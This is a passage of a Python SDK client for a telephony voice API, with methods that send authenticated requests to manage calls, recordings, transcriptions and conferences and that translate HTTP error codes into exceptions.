        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the JSON POST request.
    req = self.config.http_client.post(
        url,
        headers={'content-type': 'application/json; charset=utf-8'},
        parameters=APIHelper.json_serialize(body))
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # No payload to decode; return the bare response wrapper.
    return ApiResponse(resp)
def modify_call_recording_state(self,
                                account_id,
                                call_id,
                                body):
    """Pause or resume recording on an active call.

    Performs ``PUT /api/v2/accounts/{accountId}/calls/{callId}/recording``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call whose recording state
            should change.
        body (ModifyCallRecordingRequest): Desired recording state.

    Returns:
        ApiResponse: HTTP response wrapper; this endpoint returns no body.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recording',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the JSON PUT request.
    req = self.config.http_client.put(
        url,
        headers={'content-type': 'application/json; charset=utf-8'},
        parameters=APIHelper.json_serialize(body))
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # No payload to decode; return the bare response wrapper.
    return ApiResponse(resp)
def get_call_recordings(self,
                        account_id,
                        call_id):
    """List metadata for all recordings made during a call.

    Performs ``GET /api/v2/accounts/{accountId}/calls/{callId}/recordings``.
    The result may be an empty list if the call was not recorded.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call whose recordings are
            requested.

    Returns:
        ApiResponse: HTTP response wrapper whose body is the decoded list
            of CallRecordingMetadata.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recordings',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the GET request.
    req = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # Decode the JSON payload into the model type and wrap it.
    decoded = APIHelper.json_deserialize(
        resp.text, CallRecordingMetadata.from_dictionary)
    return ApiResponse(resp, body=decoded)
def get_call_recording(self,
                       account_id,
                       call_id,
                       recording_id):
    """Fetch metadata for one specific call recording.

    Performs ``GET /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call.
        recording_id (string): Identifier of the recording.

    Returns:
        ApiResponse: HTTP response wrapper whose body is the decoded
            CallRecordingMetadata.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False},
         'recordingId': {'value': recording_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the GET request.
    req = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # Decode the JSON payload into the model type and wrap it.
    decoded = APIHelper.json_deserialize(
        resp.text, CallRecordingMetadata.from_dictionary)
    return ApiResponse(resp, body=decoded)
def delete_recording(self,
                     account_id,
                     call_id,
                     recording_id):
    """Delete one specific call recording.

    Performs ``DELETE /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call.
        recording_id (string): Identifier of the recording to delete.

    Returns:
        ApiResponse: HTTP response wrapper; this endpoint returns no body.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False},
         'recordingId': {'value': recording_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the DELETE request (no headers needed).
    req = self.config.http_client.delete(url)
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # No payload to decode; return the bare response wrapper.
    return ApiResponse(resp)
def get_download_call_recording(self,
                                account_id,
                                call_id,
                                recording_id):
    """Download the specified recording's media.

    Performs ``GET /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call.
        recording_id (string): Identifier of the recording to download.

    Returns:
        ApiResponse: HTTP response wrapper. The body is the deserialized
            response text when present, otherwise None.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Prepare query URL
    _url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media'
    _url_path = APIHelper.append_url_with_template_parameters(_url_path, {
        'accountId': {'value': account_id, 'encode': False},
        'callId': {'value': call_id, 'encode': False},
        'recordingId': {'value': recording_id, 'encode': False}
    })
    _query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
    _query_builder += _url_path
    _query_url = APIHelper.clean_url(_query_builder)
    # Prepare headers
    _headers = {
        'accept': 'application/json'
    }
    # Prepare and execute request
    _request = self.config.http_client.get(_query_url, headers=_headers)
    VoiceBasicAuth.apply(self.config, _request)
    _response = self.execute_request(_request)
    # Endpoint and global error handling using HTTP status codes.
    if _response.status_code == 400:
        raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
    elif _response.status_code == 401:
        raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
    elif _response.status_code == 403:
        raise ApiErrorException('User unauthorized to perform this action.', _response)
    elif _response.status_code == 404:
        raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
    elif _response.status_code == 415:
        raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
    elif _response.status_code == 429:
        raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
    elif _response.status_code == 500:
        raise ApiErrorException('Something unexpected happened. Please try again.', _response)
    self.validate_response(_response)
    # BUG FIX: the original guard was
    #   if (_response.text is not None) or (not str(_response.text)):
    # The `or` made the second clause dead for any non-None text, and when
    # the text WAS None the branch was skipped, leaving `decoded` unbound
    # and raising NameError below. Deserialize only a non-empty body.
    decoded = APIHelper.json_deserialize(_response.text) if _response.text else None
    _result = ApiResponse(_response, body=decoded)
    return _result
def delete_recording_media(self,
                           account_id,
                           call_id,
                           recording_id):
    """Delete the media for one specific call recording.

    Performs ``DELETE /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call.
        recording_id (string): Identifier of the recording whose media
            should be deleted.

    Returns:
        ApiResponse: HTTP response wrapper; this endpoint returns no body.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False},
         'recordingId': {'value': recording_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the DELETE request (no headers needed).
    req = self.config.http_client.delete(url)
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # No payload to decode; return the bare response wrapper.
    return ApiResponse(resp)
def get_call_transcription(self,
                           account_id,
                           call_id,
                           recording_id):
    """Download the transcription of one specific call recording.

    Performs ``GET /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call.
        recording_id (string): Identifier of the transcribed recording.

    Returns:
        ApiResponse: HTTP response wrapper whose body is the decoded
            TranscriptionResponse.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False},
         'recordingId': {'value': recording_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the GET request.
    req = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # Decode the JSON payload into the model type and wrap it.
    decoded = APIHelper.json_deserialize(
        resp.text, TranscriptionResponse.from_dictionary)
    return ApiResponse(resp, body=decoded)
def create_transcribe_call_recording(self,
                                     account_id,
                                     call_id,
                                     recording_id,
                                     body):
    """Request transcription of one specific call recording.

    Performs ``POST /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call.
        recording_id (string): Identifier of the recording to transcribe.
        body (TranscribeRecordingRequest): Transcription options.

    Returns:
        ApiResponse: HTTP response wrapper; this endpoint returns no body.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses,
            including 410 when the recording media has been deleted.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False},
         'recordingId': {'value': recording_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the JSON POST request.
    req = self.config.http_client.post(
        url,
        headers={'content-type': 'application/json; charset=utf-8'},
        parameters=APIHelper.json_serialize(body))
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions. Unlike the
    # sibling endpoints this one also defines a 410 (media deleted) case.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        410: (ApiErrorException, "The media for this recording has been deleted, so we can't transcribe it"),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # No payload to decode; return the bare response wrapper.
    return ApiResponse(resp)
def delete_call_transcription(self,
                              account_id,
                              call_id,
                              recording_id):
    """Delete the transcription of one specific call recording.

    Performs ``DELETE /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call.
        recording_id (string): Identifier of the recording whose
            transcription should be deleted.

    Returns:
        ApiResponse: HTTP response wrapper; this endpoint returns no body.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False},
         'recordingId': {'value': recording_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the DELETE request (no headers needed).
    req = self.config.http_client.delete(url)
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # No payload to decode; return the bare response wrapper.
    return ApiResponse(resp)
def get_conferences(self,
                    account_id,
                    name=None,
                    min_created_time=None,
                    max_created_time=None,
                    page_size=1000,
                    page_token=None):
    """GET /api/v2/accounts/{accountId}/conferences.

    Returns information about the conferences in the account.

    Args:
        account_id (string): Account whose conferences are listed.
        name (string, optional): Value for the 'name' query parameter.
        min_created_time (string, optional): Value for 'minCreatedTime'.
        max_created_time (string, optional): Value for 'maxCreatedTime'.
        page_size (int, optional): Value for 'pageSize'. Defaults to 1000.
        page_token (string, optional): Value for 'pageToken'.

    Returns:
        ApiResponse: Wrapper around the HTTP response whose body is the
            payload deserialized via ConferenceState.from_dictionary.

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template, then attach the filter query parameters.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/conferences',
        {'accountId': {'value': account_id, 'encode': False}}
    )
    url = APIHelper.append_url_with_query_parameters(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path,
        {
            'name': name,
            'minCreatedTime': min_created_time,
            'maxCreatedTime': max_created_time,
            'pageSize': page_size,
            'pageToken': page_token,
        }
    )

    # Build, authenticate and send the GET request.
    request = self.config.http_client.get(
        APIHelper.clean_url(url), headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # Deserialize the JSON body into ConferenceState model objects.
    payload = APIHelper.json_deserialize(response.text, ConferenceState.from_dictionary)
    return ApiResponse(response, body=payload)
def get_conference(self,
                   account_id,
                   conference_id):
    """GET /api/v2/accounts/{accountId}/conferences/{conferenceId}.

    Returns information about the specified conference.

    Args:
        account_id (string): Account that owns the conference.
        conference_id (string): Conference to look up.

    Returns:
        ApiResponse: Wrapper around the HTTP response whose body is the
            payload deserialized via ConferenceState.from_dictionary.

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template with both identifiers.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/conferences/{conferenceId}',
        {
            'accountId': {'value': account_id, 'encode': False},
            'conferenceId': {'value': conference_id, 'encode': False},
        }
    )
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)

    # Build, authenticate and send the GET request.
    request = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # Deserialize the JSON body into a ConferenceState model object.
    payload = APIHelper.json_deserialize(response.text, ConferenceState.from_dictionary)
    return ApiResponse(response, body=payload)
def modify_conference(self,
                      account_id,
                      conference_id,
                      body):
    """POST /api/v2/accounts/{accountId}/conferences/{conferenceId}.

    Modify the conference state.

    Args:
        account_id (string): Account that owns the conference.
        conference_id (string): Conference to modify.
        body (ModifyConferenceRequest): Request payload, JSON-serialized
            before sending.

    Returns:
        ApiResponse: Wrapper around the HTTP response (no decoded body).

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template with both identifiers.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/conferences/{conferenceId}',
        {
            'accountId': {'value': account_id, 'encode': False},
            'conferenceId': {'value': conference_id, 'encode': False},
        }
    )
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)

    # Build, authenticate and send the POST request with a JSON body.
    request = self.config.http_client.post(
        url,
        headers={'content-type': 'application/json; charset=utf-8'},
        parameters=APIHelper.json_serialize(body))
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # No response body is decoded for this endpoint.
    return ApiResponse(response)
def modify_conference_member(self,
                             account_id,
                             conference_id,
                             call_id,
                             body):
    """PUT /api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{callId}.

    Updates settings for a particular conference member.

    Args:
        account_id (string): Account that owns the conference.
        conference_id (string): Conference the member belongs to.
        call_id (string): Call identifying the member to update.
        body (ConferenceMemberState): Request payload, JSON-serialized
            before sending.

    Returns:
        ApiResponse: Wrapper around the HTTP response (no decoded body).

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template with all three identifiers.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{callId}',
        {
            'accountId': {'value': account_id, 'encode': False},
            'conferenceId': {'value': conference_id, 'encode': False},
            'callId': {'value': call_id, 'encode': False},
        }
    )
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)

    # Build, authenticate and send the PUT request with a JSON body.
    request = self.config.http_client.put(
        url,
        headers={'content-type': 'application/json; charset=utf-8'},
        parameters=APIHelper.json_serialize(body))
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # No response body is decoded for this endpoint.
    return ApiResponse(response)
def get_conference_member(self,
                          account_id,
                          conference_id,
                          member_id):
    """GET /api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{memberId}.

    Returns information about the specified conference member.

    Args:
        account_id (string): Account that owns the conference.
        conference_id (string): Conference the member belongs to.
        member_id (string): Member to look up.

    Returns:
        ApiResponse: Wrapper around the HTTP response whose body is the
            payload deserialized via ConferenceMemberState.from_dictionary.

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template with all three identifiers.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{memberId}',
        {
            'accountId': {'value': account_id, 'encode': False},
            'conferenceId': {'value': conference_id, 'encode': False},
            'memberId': {'value': member_id, 'encode': False},
        }
    )
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)

    # Build, authenticate and send the GET request.
    request = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
    failures = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if response.status_code in failures:
        error_cls, message = failures[response.status_code]
        raise error_cls(message, response)
    self.validate_response(response)

    # Deserialize the JSON body into a ConferenceMemberState model object.
    payload = APIHelper.json_deserialize(response.text, ConferenceMemberState.from_dictionary)
    return ApiResponse(response, body=payload)
def get_conference_recordings(self,
                              account_id,
                              conference_id):
    """GET /api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings.

    Returns a (potentially empty) list of metadata for the recordings
    that took place during the specified conference.

    Args:
        account_id (string): Account that owns the conference.
        conference_id (string): Conference whose recordings are listed.

    Returns:
        ApiResponse: Wrapper around the HTTP response whose body is the
            payload deserialized via
            ConferenceRecordingMetadata.from_dictionary.

    Raises:
        APIException: When the remote API answers with an error status
            code; the exception carries the message and the response.
    """
    # Expand the path template with both identifiers.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings',
        {
            'accountId': {'value': account_id, 'encode': False},
            'conferenceId': {'value': conference_id, 'encode': False},
        }
    )
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)

    # Build, authenticate and send the GET request.
    request = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, request)
    response = self.execute_request(request)

    # Map error status codes onto the exceptions callers expect.
